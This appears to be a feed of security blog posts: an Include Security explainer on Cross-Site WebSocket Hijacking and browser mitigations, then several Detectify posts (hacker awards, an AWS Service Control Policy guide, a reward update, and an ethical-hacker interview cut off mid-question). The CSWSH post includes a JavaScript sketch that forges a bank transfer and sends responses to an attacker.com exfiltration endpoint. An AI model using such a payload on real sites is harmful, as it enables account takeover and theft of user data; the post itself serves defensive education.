
Cross-Site WebSocket Hijacking Exploitation in 2025

Some of my favorite findings discovered during our client assessments at Include Security have exploited Cross-Site WebSocket Hijacking (CSWSH) vulnerabilities. However, going back through those past findings, I realize that some of them wouldn’t work today in all browsers. This is due to improvements in browsers’ baseline security around cross-origin requests, including Third-Party Cookie Restrictions/Total Cookie Protection and Private Network Access. CSWSH is a somewhat incidental casualty of these features, which may be why I’ve not been able to find much discussion about its increasing limitations – apart from a passing mention in this excellent primer.

This blog post explores the current state of browser mitigations that make CSWSH harder to exploit. These will be explored together with three case studies of past findings, investigating which of the attacks still work today.

CSWSH Recap

A quick recap on CSWSH. It’s a vulnerability that arises because WebSockets are not protected by the most important browser security mechanism, the Same Origin Policy (SOP). The lack of SOP protection by default enables malicious websites to open WebSocket connections to targeted websites running WebSocket servers. A typical example: a user browses to attacker.com, client-side code running on attacker.com opens a WebSocket connection to bank.com, and the browser helpfully attaches the user’s cookies authenticating to bank.com. Now attacker.com can send arbitrary WebSocket messages to bank.com while masquerading as the user.
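To make the attack concrete, here is a minimal sketch of the client-side code a malicious page might run; the endpoint, message format, and exfiltration URL are all made up for illustration:

// Runs on attacker.com; the browser attaches the victim's bank.com cookies
// to the handshake if SameSite/third-party-cookie rules allow it.
const ws = new WebSocket('wss://bank.com/ws');   // hypothetical endpoint

ws.onopen = () => {
  // Masquerade as the victim and issue an action on their behalf.
  ws.send(JSON.stringify({ action: 'transfer', to: 'attacker', amount: 1000 }));
};

ws.onmessage = (event) => {
  // Unlike classic CSRF, the attacker can also read the server's responses.
  fetch('https://attacker.com/exfil', { method: 'POST', body: event.data });
};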

The impact is similar to a Cross-Site Request Forgery (CSRF) attack, but more powerful since it’s two-way: the malicious site can also read the responses to malicious requests. Normally a CSRF attack can’t read the server’s responses – unless the targeted server supports Cross-Origin Resource Sharing (CORS) requests, allows included credentials, and is misconfigured to reflect an attacker-controlled origin in the Access-Control-Allow-Origin response header.

CSWSH Mitigation

The definitive way to mitigate CSWSH is for the WebSocket server to check the Origin header of the WebSocket handshake request. If the request does not come from a trusted and expected Origin, the WebSocket handshake should fail. “Missing Origin Validation in WebSockets” has its own Common Weakness Enumeration entry, CWE-1385.
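As an illustration, here is one minimal sketch of such a check using the Node.js ws library (mentioned later in this post); the allowed origin is a placeholder:

const { WebSocketServer } = require('ws');

// Only origins on this allowlist may complete the handshake (placeholder value).
const ALLOWED_ORIGINS = new Set(['https://app.example.com']);

const wss = new WebSocketServer({
  port: 8080,
  // verifyClient receives the handshake's Origin header; returning false
  // rejects the upgrade before a connection is established.
  verifyClient: ({ origin }) => ALLOWED_ORIGINS.has(origin),
});

wss.on('connection', (socket) => {
  // Application logic only runs for connections from trusted origins.
  socket.on('message', (msg) => { /* ... */ });
});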

CSRF attacks are often addressed by attaching a pseudo-random CSRF token in a request HTTP header. The server can compare the header value to a CSRF token stored in a cookie (the double-submit cookie pattern). But this is harder to achieve with WebSocket handshakes, because the browser WebSocket API does not allow setting arbitrary request headers. There are some workarounds, such as putting a token in the Sec-WebSocket-Protocol header or authenticating in the first WebSocket message.
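As a rough sketch of those workarounds (the endpoint, token storage, and message format are placeholders, not a specific application’s API):

// Placeholder: how the token is issued and stored is application-specific.
const token = sessionStorage.getItem('wsAuthToken');

// Option 1: authenticate in the first WebSocket message.
const ws = new WebSocket('wss://app.example.com/ws');
ws.onopen = () => {
  ws.send(JSON.stringify({ type: 'auth', token }));
};

// Option 2: pass the token via the subprotocol list, which browsers send in
// the Sec-WebSocket-Protocol handshake header. The value must be a valid
// header token, and the server has to select one of the offered values for
// the handshake to complete.
const ws2 = new WebSocket('wss://app.example.com/ws', ['access_token', token]);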

CSWSH Prerequisites

There are a number of prerequisites for a CSWSH attack to work:
1) The app uses cookie-based authentication
2) The authentication cookie is set to SameSite=None
3) The WebSocket server does not validate the Origin of the WebSocket handshake request (and does not use another means to validate the source of requests, such as authenticating in the first WebSocket message).

This seems like a lot of things that have to line up, but CSWSH has been more common than I expected. If I had to speculate:
1) Cookies are still fairly popular compared to token auth.
2) Authentication services often operate across different origins, forcing session cookies to use SameSite=None and to rely on CSRF tokens as the main mechanism to defeat CSRF – tokens which aren’t applied to WebSocket handshakes.
3) The ws library for Node.js, and WebSocket libraries for other common web app frameworks, don’t enforce Origin validation.

Mitigations

Now let’s discuss current browser security measures and how these make CSWSH attacks harder to achieve than they used to be. We’ll cover three different existing mitigations that can prevent CSWSH attacks, with a brief case study following each one describing how the mitigation affected the exploitability of CSWSH.

SameSite=Lax by default

SameSite=Lax by default is a longstanding and effective browser behavior that affects CSWSH attacks. If a SameSite setting is not explicitly configured on a cookie, Chrome has treated it as SameSite=Lax by default since 2020. SameSite=Lax means that browsers will send cookies in cross-site requests only for GET requests that resulted from a top-level navigation by the user, like clicking a link.
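For reference, this behavior is driven by the SameSite attribute on the Set-Cookie response header; the cookie name and value below are illustrative:

Set-Cookie: session=abc123; Secure; HttpOnly; SameSite=Lax
Set-Cookie: session=abc123; Secure; HttpOnly; SameSite=None

The first cookie is only attached to cross-site requests that are top-level GET navigations, while the second (which must also be marked Secure) is attached to cross-site requests in general, including WebSocket handshakes – the configuration CSWSH depends on. A cookie with no SameSite attribute is treated as Lax by Chrome, as described above.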

This has done a lot to make CSRF and CSWSH attacks harder to pull off by default. Note that not all browsers set SameSite=Lax by default. Firefox tried, but too many sites broke, so Firefox instead relies more on Total Cookie Protection, described below. Safari also doesn’t use SameSite=Lax by default but, similarly to Firefox, blocks third-party cookies. Microsoft Edge, being based on Chromium, follows the same behavior as Chrome.

Due to breakage of SSO logins during rollout, back in 2020 Chrome introduced a temporary measure that makes default SameSite=Lax behave slightly differently from a cookie that has been explicitly set to SameSite=Lax by the backend application. For implicit SameSite=Lax, there is a two-minute grace period after the cookie is issued during which it is still sent with top-level cross-site POST requests. As described by PortSwigger, there are scenarios where this enables a bypass of the SameSite protection. I verified that this two-minute grace period still exists, in both Chrome and Firefox. However, it does not apply to CSWSH attacks, since WebSocket handshakes are not top-level POST requests. Therefore SameSite needs to be explicitly set to None for CSWSH attacks to work; no other value for SameSite will allow CSWSH to operate.

Case Study A

This was a 2021 engagement I did against a website that implemented a WebSocket API for making changes to a document. Session cookies did not set a SameSite attribute. At the time, this enabled a CSWSH attack in Firefox, but not in Chrome, due to SameSite=Lax by default. An attacker could use CSWSH to make arbitrary modifications to users’ documents. The attack worked when we found it, but today the attack would no longer work in Firefox either due to Total Cookie Protection.

So what is Total Cookie Protection?

Over the past several years Firefox has been locking down their “Enhanced Tracking Protection” feature. It’s unclear exactly when, but sometime in 2022-2024 “Total Cookie Protection” was enabled by default for the whole userbase, and this is really effective at blocking CSWSH.

Total Cookie Protection works by isolating cookies to the site in which they are created. Essentially each site has its own cookie storage partition to prevent third parties from linking a user’s browsing history together. This is designed to prevent a tracker.com script loaded on site A from setting a cookie which can then be read by a tracker.com script loaded on site B.

It also has the side-effect of stopping cookie-based CSWSH. A malicious site cannot perform a successful cross-site WebSocket handshake with a user’s cookie, since that cookie is outside the current cookie storage partition. This applies even if the cookie is configured as SameSite=None.

Total Cookie Protection can be disabled in Firefox’s Browser Privacy settings by selecting the “Custom” mode for “Enhanced Tracking Protection”, then unchecking the Cookies setting or changing it to the old default, “Cross-site tracking cookies”.

Note that Google has been announcing the blocking of third-party cookies in Chrome by default for years, but has kept delaying it for various reasons. The latest target was early 2025, but they changed plans in July 2024. It’s straightforward to configure in the “Privacy and security” settings, though, and this setting is enabled by default within Incognito Mode. Some distributions, notably Chromium on Debian Linux, have the default set to “Block third-party cookies”.

Case Study B

This engagement was against a large web application with a GraphQL API and SameSite=None cookies. Direct CSRF against the GraphQL API wasn’t possible due to the server enforcing the application/json Content-Type, which triggers preflighted requests from the browser. However, the GraphQL API could also be called through a WebSocket. The WebSocket was vulnerable to CSWSH, enabling arbitrary API calls to be made by a third-party attacker, including all account operations such as deleting a user’s account.

This vulnerability would now be unexploitable in default Firefox due to Total Cookie Protection, but is still currently exploitable in default Chrome/Edge.

Private Network Access

We’ve looked at two typical CSWSH scenarios; now for a more unusual one that came up in a client assessment. Let’s start with the case study, since it gives context on a situation where cookies were not used for authentication.

Case Study C

This engagement was against a network device with a camera. A design decision was that users on the same network could access the camera and perform limited configuration without further authentication. Being on the same private network was considered adequate authentication (cookies were not required). A WebSocket API that was vulnerable to CSWSH was added to the device. As a result, malicious websites on the Internet could stream video from the devices and configure them through the browser of a targeted user connected to the private network.

While reviewing this attack against a WebSocket server on a private IP address, I expected it to no longer work in recent versions of Chrome due to Private Network Access (apparently enforced since Chrome 130, though I found it wasn’t enforced by default in Chromium 134 on Debian Linux).

The Private Network Access specification acknowledges that an increasing amount of services run on a user’s localhost and their private network, and describes a control similar to CORS to prevent public Internet resources from making unapproved requests to private resources. See for instance this incredible writeup against Tailscale.

Within the Private Network Access specification, IP address spaces are divided into three types: public, private, and local. A request (even a GET request) that is made from a more public to a more private address space triggers a preflight OPTIONS request that has the Access-Control-Request-Private-Network: true header attached by Chrome, and must receive a corresponding Access-Control-Allow-Private-Network: true header in the response for the main request to be sent.
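Illustratively, the preflight exchange for a request from a public website to a private address looks roughly like this (hosts and paths are placeholders):

OPTIONS /api/config HTTP/1.1
Host: 192.168.1.20
Origin: https://public.example.com
Access-Control-Request-Method: GET
Access-Control-Request-Private-Network: true

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://public.example.com
Access-Control-Allow-Methods: GET
Access-Control-Allow-Private-Network: true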

However, I found that CSWSH attacks against private IPs are not affected by Private Network Access. In my testing, attempts to send CSRF attacks against localhost addresses failed in Chrome, but there was no problem with opening WebSockets to more private IPs. On further thought this makes sense, and is called out in the specification, since Private Network Access uses CORS preflight requests as the protection method, and WebSockets do not follow SOP and thus do not use preflight requests.

Testing

To verify all the points made above, I made a small demo app; the source code is at https://github.com/IncludeSecurity/cswsh-demo

A small Node.js Express server sets a SameSite=None cookie when the / route is visited. The server also exposes a POST / route and a WebSocket handler, both of which log cookies if they are seen in the request.
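In condensed form, the demo server behaves roughly like the sketch below; see the linked repository for the actual code, since ports, cookie names, and TLS handling are simplified here:

const express = require('express');
const { WebSocketServer } = require('ws');

const app = express();

// Visiting / sets a SameSite=None cookie that the cross-site tests try to replay.
app.get('/', (req, res) => {
  res.cookie('session', 'test-value', { sameSite: 'none', secure: true });
  res.send('cookie set');
});

// POST / logs any cookies seen in the request (CSRF test target).
app.post('/', (req, res) => {
  console.log('POST cookies:', req.headers.cookie);
  res.sendStatus(200);
});

// The WebSocket handler logs cookies seen in the handshake (CSWSH test target).
const server = app.listen(3000);
const wss = new WebSocketServer({ server });
wss.on('connection', (socket, req) => {
  console.log('WebSocket handshake cookies:', req.headers.cookie);
});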

The WebSocket server and the demo page were then hosted on separate HTTPS domains, and requests were tried in different browsers to verify whether different types of CSRF and CSWSH attacks were successful. The /reflected endpoint was added to elicit the error specific to attempting a CSRF against a private IP with Private Network Access; otherwise a generic CORS error is displayed in DevTools.

Note that inspecting DevTools for WebSocket requests can be misleading – in Chrome, cookies are not always shown in DevTools for WebSocket handshakes! Per a Chromium developer in the linked issue: “Cookie headers are appended at a lower layer in the networking code, so DevTools doesn’t always have everything. Normal HTTP requests do show cookies in DevTools, including HttpOnly cookies, because they involve a different cookie reporting path that sends the raw headers directly to DevTools.”

Conclusion

So to sum up:

  • SameSite=Lax, which is the default for cookies in Chrome, is a decent mitigation for CSWSH, so CSWSH requires SameSite=None session/auth cookies.
  • While Firefox doesn’t apply SameSite=Lax by default, Firefox’s Total Cookie Protection appears to be a complete mitigation for CSWSH.
  • The Chrome team has discussed a similar third-party cookie blocking technique for years, but still hasn’t implemented it and is investigating other approaches. If they did block third-party cookies by default, CSWSH would be largely eliminated.
  • Private Network Access in Chrome does not block CSWSH against private networks.

Revisiting the three case studies:

  • A) No SameSite attribute specified on cookie -> no longer works in any major browser.
  • B) Typical CSWSH with SameSite=None cookie -> works in default Chrome but not Firefox.
  • C) CSWSH against private IP -> still works on all browsers even though my initial expectation was that it would no longer work in Chrome.

For defenders, adding an Origin check in the server-side WebSocket handshake handler is still the best way of defending against CSWSH attacks. This is important because, while browser mitigations are slowly improving, they cannot be fully relied upon. It is still possible to perform CSWSH under the right circumstances against default Chrome, and a user may run a browser configured to disable settings such as Total Cookie Protection. Similarly, it is not ideal to rely on the SameSite=Lax attribute on authentication cookies to protect against CSWSH: the cookies could later be changed to use SameSite=None as part of an unrelated code change, causing CSWSH vulnerabilities to become exploitable.

The post Cross-Site WebSocket Hijacking Exploitation in 2025 appeared first on Include Security Research Blog.

2024 Detectify Crowdsource Awards: Meet the Winners

18 February 2025 at 08:36

It’s that time of year again! Here at Detectify, we’re excited to celebrate the talent and dedication of our Crowdsource community members with our annual awards, the “Nobel Prizes” for ethical hacking (both originating from Sweden!). The Crowdsource awards recognize the top hackers who have helped us make the internet a safer place throughout the last year.

How the 2024 Detectify Crowdsource Awards Work

Our awards are based on several factors that highlight the diverse contributions of our hackers. This year, we’re looking at quality of submissions by considering the validity ratio, the highest number of submissions for high and critical severities, and the most value generated from submissions made in 2024.

Let’s roll out the red carpet:

Perfect Precision Award

This award recognizes the hacker with the highest percentage of valid submissions. With an impressive 65% validity ratio, the winner is Geek Freak! Our internal research team truly admires his consistent accuracy and attention to detail.

Severity Savant Award

While all submissions are crucial to help us protect our customers’ attack surfaces, this particular award honors the hacker who submitted the highest number of valid High and Critical submissions as rated by our internal security research team. Congratulations, once again, to Geek Freak for an outstanding 49 valid High and Critical submissions!

Hit Happens Award

This award goes to the hacker whose submission during the year 2024 resulted in the most β€œhits” (unique times one specific vulnerability has been found in customers’ systems). With a remarkable 71 hits, the winner is cswiers! His work has helped a bunch of customers (and many more to come).

Team Trophy

This special award is voted on by Detectify’s internal security researchers. It recognizes a Crowdsource member who has demonstrated exceptional work, high-quality submissions and great collaboration during 2024. This year, the Team Trophy goes to Joshua!

A Huge Thank You

We want to express our deepest gratitude to every member of our Crowdsource community. Your hard work, dedication, and passion for ethical hacking are what make this program successful. The Detectify Crowdsource Awards are just a small way of showing our appreciation for the role you play in securing thousands of attack surfaces.

Want to Join the Crowdsource Community?

Inspired by our winners? Learn more about the Detectify Crowdsource program and how you can join our team of ethical hackers.

The post 2024 Detectify Crowdsource Awards: Meet the Winners appeared first on Labs Detectify.

Reducing the attack surface in AWS

26 March 2024 at 11:17

“Anything that can go wrong will go wrong” – Murphy’s Law. We want to reduce what can go wrong. The smaller our attack surface, the fewer things we need to worry about. An excellent way of reducing the attack surface (and our cognitive load) is using AWS Service Control Policies (SCPs). In this post, I’ll describe how we approached it.

What are SCPs?

SCPs are policies to control what can and cannot be done in one or more AWS accounts, regardless of what an IAM policy might say (even if you’re root). SCPs can be applied to accounts or organizational units (OUs). By default, everything is allowed, and it’s up to us to deny what we don’t need. SCPs are always a defense in depth and will never trigger if IAM permissions are properly configured, but relying on perfect IAM configuration is not a luxury we can afford to count on. For more information about SCPs, see the official AWS documentation on SCPs.

What do we want to allow or deny?

Preferably, we would deny any action we’re not using, but that’s most likely an administrative hell, and we’ll end up blocking developers daily, so we decided against even trying it. At Detectify, we’ve gone for a more pragmatic approach:

  • Only allow AWS services we use (rather than actions)
  • Only allow regions we use
  • Disallow dangerous actions

This has been a good balance between reducing things we need to worry about and keeping developers productive.

Only allow services we use

The easiest way to find which services you use is by generating an Organization activity report (aka an organizations access report). This report shows when services were last used, if at all.

The report can be generated based on an OU or a specific account. In our case, we started with generating a report for our Production OU. To generate such a report, we can use AWS CLI:

aws iam generate-organizations-access-report \
  --entity-path "o-XXXXXXXXXX/r-XXXX/ou-XXXX-XXXXXXXX"

Where the entity-path is the AWS Organizations entity path to our Production OU.

Once the report is generated we can get the list of used services with:

aws iam get-organizations-access-report \
  --job-id "JobId-goes-here" \
  --max-items 1000 \
  --query 'AccessDetails[?TotalAuthenticatedEntities > `0`].[ServiceName,ServiceNamespace,LastAuthenticatedTime]'

This gives a list of all services that have been used in the tracking period. It shows the service name, the IAM namespace, and when it was last accessed.

We manually went through this list and filtered out obvious entries that were most likely just someone browsing a specific service in the AWS web console and very old activity.

With the list of used services, we created a policy that denied anything not on the list:

data "aws_iam_policy_document" "allow_only_used_services" {
  statement {
    sid       = "AllowOnlyUsedServices"
    effect    = "Deny"
    resources = ["*"]

    not_actions = [
      <LIST OF NAMESPACES OF USED SERVICES>
    ]
  }
}

This policy denies access to any service not listed in the not_actions. We seldom adopt new AWS services, so this method rarely blocks development but allows us to ensure a proper process for evaluating new services.

Only allow regions we use

We only use a few AWS regions, and there is no reason to allow usage of any region outside of that. At first glance, it might seem obvious how one can use SCP to block unused regions, but because some services are global, you cannot fully restrict access to only certain regions.

As described in Detectify’s journey to an AWS multi-account strategy, we use Control Tower. In Control Tower you can configure which regions to allow or deny, which is what we did.

Disallow known dangerous actions

While only allowing specific actions would be too much work, blocking the risky ones is a lot easier.

Exactly which SCPs to apply depends on the organization, but they tend to be far more general than IAM policies, which means they can be shared between organizations.

There are lots of good resources out there for finding example SCPs. If you search for aws scp site:github.com you’ll find plenty of examples. We went through many different SCPs for inspiration and picked the (for us) most relevant and least error-prone parts we could find.

Expensive actions

Some actions can be very expensive. We have opted to block the most expensive ones we know of. Ian Mckay has a gist with some expensive actions you might want to block to avoid costly mistakes:

data "aws_iam_policy_document" "deny_costly_actions" {
  statement {
    sid       = "DenyCostlyActions"
    effect    = "Deny"
    resources = ["*"]

    actions = [
      "acm-pca:CreateCertificateAuthority",
      "aws-marketplace:AcceptAgreementApprovalRequest",
      "aws-marketplace:Subscribe",  
      "backup:PutBackupVaultLockConfiguration",
      "bedrock:CreateProvisionedModelThroughput",
      "bedrock:UpdateProvisionedModelThroughput",
      "dynamodb:PurchaseReservedCapacityOfferings",
      "ec2:ModifyReservedInstances",   
      "ec2:PurchaseHostReservation",
      "ec2:PurchaseReservedInstancesOffering",
      "ec2:PurchaseScheduledInstances",
      "elasticache:PurchaseReservedCacheNodesOffering",
      "es:PurchaseReservedElasticsearchInstanceOffering",
      "es:PurchaseReservedInstanceOffering",
      "glacier:CompleteVaultLock",
      "glacier:InitiateVaultLock",
      "outposts:CreateOutpost",
      "rds:PurchaseReservedDBInstancesOffering",
      "redshift:PurchaseReservedNodeOffering",
      "route53domains:RegisterDomain",
      "route53domains:RenewDomain",
      "route53domains:TransferDomain",
      "s3-object-lambda:PutObjectLegalHold",
      "s3-object-lambda:PutObjectRetention",
      "s3:BypassGovernanceRetention",
      "s3:PutBucketObjectLockConfiguration",
      "s3:PutObjectLegalHold",    
      "s3:PutObjectRetention",    
      "savingsplans:CreateSavingsPlan",
      "shield:CreateSubscription",
      "snowball:CreateCluster",
    ]
  }
}

Some of these actions you might want to be careful with. For example, denying route53domains:RenewDomain could cause problems if it’s applied to the OU or account that manages domains.

SCPs via Control Tower controls

If you are, like us, using Control Tower, there are a few dozen SCPs you can enable and let Control Tower manage. In Control Tower you can filter the view to only show SCPs.

Some of the listed SCPs are enabled by default, but plenty of opt-ins exist.

SCP size limits and workarounds

SCPs can be a maximum of 5120 bytes, including whitespace. We ran into this issue because aws_iam_policy_document does not generate minimized JSON by default.

There are a few ways to work around this:

  • Use multiple policies (max 5 per OU)
  • Apply the policy to a parent OU (if you’ve reached the max 5 limit per OU)
  • Minimize the JSON

We went with the last option. There is no built-in function to minimize JSON in Terraform, but you can minimize it by running jsonencode(jsondecode()), so something like:

resource "aws_organizations_policy" "example" {
  name    = "example"
  type    = "SERVICE_CONTROL_POLICY"
  content = jsonencode(jsondecode(data.aws_iam_policy_document.example.json))
}

This allows us to have our policies written in Terraform (which is more readable, allows comments, gives linting, etc.) and still minimize the number of bytes used. If you browse the SCP via the AWS console, it won’t be shown minimized, so it’s still readable there too.

Testing SCPs before production

There is no dry-run for SCPs which makes any change to them a bit scary since you cannot know if something will break or not.

To reduce the risk of us breaking anything important, we first apply our SCPs to our Staging OU. By having the SCPs applied in staging for a while, one can see if they pass the scream test. One can also query CloudTrail via Athena to see if there are any relevant SCP errors with, for example:

SELECT * FROM cloudtrail_logs WHERE errorcode='AccessDenied' AND errormessage LIKE '%service control%';

So far we’ve been lucky enough to never encounter any issues, and the SCPs have long since been applied to production successfully!

Conclusion

SCPs allowed us to vastly reduce our attack surface and improve our defense in depth. Even though there is no dry run everything went smoothly and we now have much fewer things to keep in mind and worry about!

The post Reducing the attack surface in AWS appeared first on Labs Detectify.

2023 Detectify Crowdsource Awards: Meet the winners

6 February 2024 at 19:40

We at Detectify are thrilled to present the 2023 Detectify Crowdsource Awards, akin to the Oscars or Grammys of ethical hacking. The awards are our opportunity to celebrate our Crowdsource community members’ extraordinary talents and achievements from the past year. The ethical hackers awarded in this edition have shown exceptional skill and played a crucial role in fortifying the security of Detectify’s customers throughout a year full of threats.

Let’s roll out the red carpet and meet our distinguished winners:

Leaderboard Leader

Firzen set the bar high in 2023, amassing a staggering 51,500 points and securing the top spot on our leaderboard.

Substantial Submitter

Geek Freak demonstrated that quantity and quality can indeed go hand in hand. He exemplified consistency and impact in 2023, with an impressive tally of over 65 valid submissions throughout the year.

Superiority Submitter

The title of Superiority Submitter goes to Tengeez in 2023. With an outstanding submission validity ratio of 71%, his work exemplified quality and set the benchmark for ethical hackers in our community.

Serial Submitter

Once again, Geek Freak made his mark by clinching the Serial Submitter award. His dedication to submitting at least one valid finding every month throughout 2023 shows a level of consistency and commitment that is rare and commendable.

Critical Submitter

In the realm of high-stakes vulnerabilities, Shaikhyaser has emerged victorious in 2023, securing the new Critical Submitter award. With over two-thirds of his submissions being high or critical-severity vulnerabilities, his contributions have been pivotal in enhancing the security landscape of Detectify customers.

Lastly, we’d like to thank the whole community. All members of Detectify Crowdsource deserve a big round of applause for their valuable contributions in 2023 and for making the internet safer.

Join Crowdsource

Inspired by the accolades of our ethical hackers? We invite you to become part of this community. Apply to make the internet safer with us at Detectify Crowdsource and join a journey of discovery, challenge, and impact.

The post 2023 Detectify Crowdsource Awards: Meet the winners appeared first on Labs Detectify.

Enhancing the Detectify Crowdsource reward system with more continuous and lucrative payouts

23 October 2023 at 22:17

Starting November 1, 2023, the reward for each time a submitted module is found in customers’ assets (pay-per-hit) will be doubled for critical, high, and medium severity modules, while fixed payouts will be phased out.

Detectify Crowdsource was launched in 2018 to democratize security research coming from ethical hackers, commonly bound to bug bounty programs that yielded one-time rewards. Our unique approach pioneered the automation of crowdsourced security research, and we’ve created a profitable reward system where submitters are paid for the impact of their vulnerabilities in our customers’ assets.

Since launching our program, we have issued over USD 500,000 in rewards to our private community of ethical hackers.

On accepted submissions, Crowdsource community members would previously receive a fixed payout, determined by the severity of the vulnerability submitted, and a payout every time that vulnerability was found in our customers’ systems (pay-per-hit).

From November 1, 2023, fixed payouts will be phased out and replaced by substantial enhancements to the pay-per-hit.

Maximizing benefits for both ethical hackers and customers

We’re introducing an update to promote higher-quality modules, quicker implementation, and to ensure fair and continuous rewards for our ethical hackers:

  • Pay-per-hit is our most distinctive attribute. It allows hackers to receive a passive income for each unique hit produced in the Detectify customer base. We’re now taking pay-per-hit to new heights by amplifying rewards that maximize passive income opportunities.
  • We’re incentivizing submissions that can effectively safeguard our customers’ assets/technologies and will enable our team to streamline module triage and building. We anticipate this will mean faster processing times for submitted modules.

The new reward system

  • We are substantially increasing the pay-per-hit:
    • x2 the current amount paid per hit for critical, high, and medium severity submissions.
      (Now, USD 200, USD 100, and USD 40, respectively)
  • We’re phasing out fixed payouts for all submissions.
  • We’re boosting the 0-day bonus:
    • x3 the current amount for critical severity 0-day bonus.
      (Now, USD 300)
    • x2 the current amount for high severity 0-day bonus.
      (Now, USD 200)

For example, with the new reward system, if you submit a critical severity module that obtains 100 unique hits, you will receive 20,000 USD (100 payouts of 200 USD).

Combining human ingenuity and automation

Detectify Crowdsource consists of 400+ world-class ethical hackers that have generated over 250 million vulnerability findings across the attack surfaces of our 2000+ customers. This monumental achievement from our community is fueled by their submissions, knowledge, and dedication to making the Internet a safer place. No wonder we are proud of them!

Interested in joining our community?

Wondering how you can join our community of leading ethical hackers? Try out our signup challenge to see if you have the experience needed to join Detectify Crowdsource here.

Q&A

Will I get the new reward for modules submitted before November 1?

The new payouts will only apply to those modules submitted from November 1, 2023.

How can I make sure I’m spending time researching technologies that will generate hits?

In the Detectify CS platform, you can access the list of technologies and versions that have been fingerprinted in Detectify’s customers’ assets in the last 3 months. We’ve identified these technologies as being used by our customers to build their products. You can use this list as inspiration for what types of technologies are most commonly used by Detectify’s customers, making your submissions more likely to be successful.

What is a payout/pay-per-hit?

Every time your submitted vulnerabilities are found in a unique customer application through the Detectify service, you will receive a payout-per-hit. The amount varies depending on the severity of your module.

What is a point per hit?

Along with the payout-per-hit, you also receive points each time your submitted vulnerability is found in a unique customer asset. These points can help you climb our leaderboard. We offer awards for the users at the top of our leaderboard.

What is a 0-day bonus?

If you submit a critical or high severity 0-day vulnerability, you will receive a 0-day bonus, along with regular payouts for the module. You will receive the 0-day bonus once the module has gone live. Remember to mark your submission as a 0-day in the submission form, and then we will validate the vulnerability and start the 0-day process.

Here is an example:

  • You submit a critical severity 0-day vulnerability.
  • Once the module goes live, you receive the critical 0-day bonus payout of $300.
  • The module gets 10 hits, so you receive a payout per hit of $200 x 10 hits = $2000.
  • In total, for this module, you earned $2300.
  • Plus, as time goes on, you can receive more hits and keep the $$ coming!
  • You also receive points per hit, which equals 5000 points (500 points x 10 hits).

The post Enhancing the Detectify Crowdsource reward system with more continuous and lucrative payouts appeared first on Labs Detectify.

Q&A with a Crowdsource hacker: Sebastian Neef a.k.a. Gehaxelt

21 April 2023 at 08:31

Detectify Crowdsource hacker Sebastian Neef, otherwise known as Gehaxelt, has an inspirational background in ethical hacking. Driven by curiosity, a sense of friendly competition, and an aspiration to do good for others, he has built a successful career as an ethical hacker and cybersecurity expert.

In our recent Detectify Crowdsource Awards, Gehaxelt was the winner of the Fabulous Feedbacker award, which acknowledged his constant willingness to help, great attitude, and proactive activity in our internal channels.

Read on as Gehaxelt shares how he started out on his career path, some of his current go-to resources and tools, and valuable pieces of advice for fellow ethical hackers who are looking to further their skills.

Detectify: How did you first become interested in ethical hacking, and what inspired you to pursue it as a career?

Gehaxelt: When I was eight years old, I got my first computer. Back then, I was just playing around with lame, 2D computer games. It wasn’t until I was 14 that my father showed me how to build simple websites using plain HTML and CSS. I was thrilled and became motivated to learn more about this. At some point, it slowly evolved into writing automation bots for the games I was playing. One might not consider this to be hacking, but it helped me begin to think outside the box.

While I was finishing high school two years later, the infamous hacks by Anonymous were all over the mainstream media. It was at that time that I asked myself, “Is hacking (websites) really that easy, or are these hackers just really skilled?” To find out, I began to investigate and spent many evenings browsing the internet learning about web security and various hacking techniques.

And it turned out that hacking can be really easy if you know a few tricks. At least back then (around 2010 or so), many web frameworks, web developers, and sysadmins weren’t as security-aware as they are today, so classic vulnerabilities like SQL Injection, cross-site scripting (XSS), and others were effortlessly found.

I first came across responsible disclosure and bug bounty programs sometime around 2011/2012, which presented a great opportunity for me: legally being able to test my skills and knowledge against real-world targets and not just some simulated hacking challenges. Sure enough, I began to find issues that were worth reporting and that placed me in a few halls of fame (including those of Google, PayPal, and Twitter). That was a great feeling, and a few programs handed out swag or money in return, which was a nice motivational boost. Especially as a soon-to-be student, it was great to earn some extra money doing what I enjoyed.

When I was hacking during those years, I often imagined a “challenge” between the website’s developers and myself – in other words, can they write code that I won’t be able to hack? Can I be better than them? Many times, the answer to these questions was yes, and the resulting rush of adrenaline did the rest. 😉

“Responsible disclosure and bug bounty programs presented a great opportunity for me: Legally being able to test my skills and knowledge against real-world targets.”

However, doing it alone can be boring at times. Luckily enough, bug bounty communities were beginning to form on Twitter and various online chat groups, so using those channels, I began to exchange writeups, techniques, and ideas with others. Although it was tough competition, it had a positive feedback loop, and collaborating was fun, too.

In the end, we were helping companies to make their websites more secure and thus protect customer data from being stolen.

Detectify: What steps do you take to ensure that your work as an ethical hacker is both legal and ethical?

Gehaxelt: Unfortunately, not all websites that I frequented had a responsible disclosure or bug bounty program, so in 2012, I founded the project internetwache.org. The main idea behind the project was to see how less security-aware companies or website administrators would react to my vulnerability notifications. Plus, as I often used the service myself, I wanted to have my data secured from bad actors.

Since Germany has “hacking laws” prohibiting security testing without authorization – and I assumed that just sending out emails from “[email protected]” would quickly land me in jail – I needed to be clearer about my intentions. Thus, the project’s domain and website were intended to convey my good, ethical intentions. The site was set up to explain who I am in detail and the fact that with my testing, I’m simply trying to help companies improve their security posture: I test solely for vulnerability symptoms, not exploiting anything or pivoting into things I shouldn’t see.

From a legal perspective, the intent might not have changed anything in front of the court, but I was still a teenager and a bit naive, so I believed that nobody would sue someone trying to help them. But to reiterate: I never tried to exploit a vulnerability; instead, I just looked for the symptoms (i.e. an SQL error message/page behavior when changing parameters, broken HTML when entering some tags, etc.). Also, I ensured that the emails I sent always had a friendly tone and never asked for anything in return.

This appeared to have worked: The majority of people that I contacted responded in a friendly manner, thanked me for pointing out the vulnerability, and sometimes even offered a token of appreciation. The worst experiences that I had were either being ignored or being told to not bother the recipient with such things.

Coming back to the initial question, though, I believe that it’s important to know the boundaries. Over the recent years, we’ve heard a few stories of security researchers going too far and getting in trouble. If one respects the scope of a program, tries not to break things when performing their tests, and doesn’t attempt to extort anything (a.k.a. “bounty plz”), chances are good that it will be a win-win situation.

But of course, my story could totally be survivor-biased and might not work out well for others, so take it with a grain of salt.

“If one respects the scope of a program and tries not to break things when performing their tests, chances are good that it will be a win-win situation.”

In the end, it all boils down to trust. Can you be trusted not to overstep visible (or invisible) boundaries? Can you effectively communicate your good faith effort?

In all cases, it certainly helps to be aware of the rules of a responsible disclosure and bug bounty program and follow them thoroughly. If you’re unsure, ask first.

Detectify: How do you stay up-to-date with the latest hacking techniques and technologies? What are some of your go-to research resources?

